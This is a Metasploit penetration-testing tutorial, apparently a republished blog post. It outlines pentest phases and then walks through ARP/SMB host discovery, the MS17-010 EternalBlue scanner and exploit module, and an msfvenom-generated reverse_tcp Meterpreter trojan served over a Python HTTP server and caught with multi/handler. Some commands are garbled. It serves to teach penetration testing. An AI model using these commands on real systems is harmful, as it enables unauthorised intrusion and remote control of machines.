Msfconsole exploit process

Enterprise 2023-05-04 20:45:08 views: null

# 1. Phase division:

Vulnerability exploitation is divided into the stages of early interaction, intelligence collection, threat modeling, vulnerability analysis, penetration and exploitation, and post-exploitation and exploitation report.

## 1. Early stage of interaction:

Interactive discussions with client organizations to determine scope, goals, etc.

 This stage can be understood as the stage before intelligence collection, mainly to find the target confirmation range

## 2. Intelligence gathering stage:

For more target organization information:

| Peripheral Information Search - Google

​ Host detection and port scanning such as -Nmap

​ Service scanning Use the service scanning module in auxiliary/scanner/ in metasploit to scan the service version and other information in the target machine

​ Network Vulnerability Scanning - OpenVAS, Nessus, etc.

​ Other tools scan py script scan

## 3. Threat modeling phase:

Sort out the clues and determine the most feasible exploit channel. The documents written in this modeling stage are not for yourself but for the whole team to facilitate multi-person cooperation​          

This stage is mainly to sort out the collected information and clarify the idea of ​​exploiting the vulnerability.

## 4. Vulnerability analysis stage:

Search for available exploit code resources

​This stage mainly selects and matches possible exploit modules, shellcode

## 5. Penetration stage:

Find security holes, hack into the system

​At this stage, try to exploit the vulnerability, configure monitoring, and start exploiting the vulnerability

## 6. Post-exploitation stage:

Meterpreter, implement operations

​At this stage, the relevant data download backdoor maintenance, privilege escalation and other operations will be implemented

## 7. Report phase:

Exploitation Penetration Test Report 

            This stage is mainly to summarize the penetration. The overview generally includes time, personnel, scope of vulnerability exploitation, technical means and so on. In this part, we need to determine the time frame for exploiting the exploit, the personnel and contact information involved in exploiting the exploit, the agreed scope of exploiting the exploit, and descriptions of techniques and tools used in the exploiting process. Clearly write the early interaction, intelligence collection, threat modeling, vulnerability analysis, penetration and exploitation, post-penetration and exploitation, vulnerability exploitation results, security recommendations, etc.

In the process of writing, special attention should be paid to: the description of the vulnerability should not be too simple, and it should be mentioned in one stroke; in the security suggestion section, avoid putting forward security suggestions that have no practical significance, such as strengthening security awareness; the report structure is chaotic, and there are too many complicated technical terms , such as around the dog, x station, etc.;

# 2. Actual operation (example)

Host range and target identified

1 Intelligence gathering

Discover surviving hosts on the intranet based on msf

search search

Enter search scanner type:auxiliary in the msf terminal

Modules that can be used to discover hosts

auxiliary/scanner/discovery/arp_sweep # Discover surviving hosts on the intranet based on ARP

auxiliary/scanner/discovery/udp_sweep # Discover surviving hosts on the intranet based on UDP

auxiliary/scanner/ftp/ftp_version # Discover FTP service

auxiliary/scanner/http/http_version # Discover HTTP service

auxiliary/scanner/smb/smb_version # Discover surviving hosts in the intranet based on smb

Discover surviving hosts on the intranet based on netbios

Discover surviving hosts on the intranet based on snmap

Discover surviving hosts on the intranet based on ICMP

2 Threat Modeling

---

After the first step of intelligence collection, we discovered the target machine ip through arp

Then by scanning the ip of the target machine, we know that the target machine has opened port 80, has web services, and opened ftp ports, which has file services

open smb

Finally decided to exploit smb-related vulnerabilities

The alternative is exploited by implanting a Trojan horse

---

3 Vulnerability analysis

The first step is to check the smb exploit vulnerabilities, such as Eternal Blue

1 Query the modules related to msf and Eternal Blue

Use the command search ms17_010

2 Then we took advantage of an Eternal Blue scanning module

use auxiliary/scanner/smb/smb_ms17_010

3 Enter options to view the parameters that the scanning module needs to configure

3.1 Then we configured rhost (rhost refers to the target host ip)

ip roast set

4 Then we perform scan input run

Potentially vulnerable hosts discovered

4 Penetration

---

1 Load the EternalBlue exploit module

use exploit/windows/smb/ms17_010_eternalblue

2 Enter options to view the parameters that the scanning module needs to configure

3.1 Then we configured rhost (rhost refers to the target host ip)

ip roast set

3.2 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)

set lhost   ip

3.3 Then we configured lport (referring to the monitored port)

set lport   ip

Note that the port must not be occupied

4 Then we execute the scan input run to execute the EternalBlue exploit

But the discovery failed, indicating that the module has been used but did not return the corresponding session

![image.png](10-11 msfconsole exploit process.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)

5 Alternatives are exploited by implanting Trojan horses

---

1 We know that the target machine is a win system, so use msfvenom to generate a win platform Trojan horse

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

2 After the vulnerability is generated, upload the Trojan to the target machine by starting a py service

python -m SimpleHTTPServer 80

3 To configure the monitoring program we use

use exploit/multi/handler

3 Enter options to enter the configuration

3.1 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)

set lhost   ip

3.2 Then we configured lport (referring to the monitored port)

set lport   ip

Note that the port must be the same as the Trojan port generated by msfvenom

4 Configure the attack load payload

set payload windows/meterpreter/reverse_tcp

5 Execute the exploit and wait for the target machine to execute the Trojan horse

6 The target machine executes the Trojan horse

exploit success and get meterpreter

---

5 Post-exploitation

go to new document

6 Reporting phases

Guess you like

Origin blog.csdn.net/hmysn/article/details/128411068
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com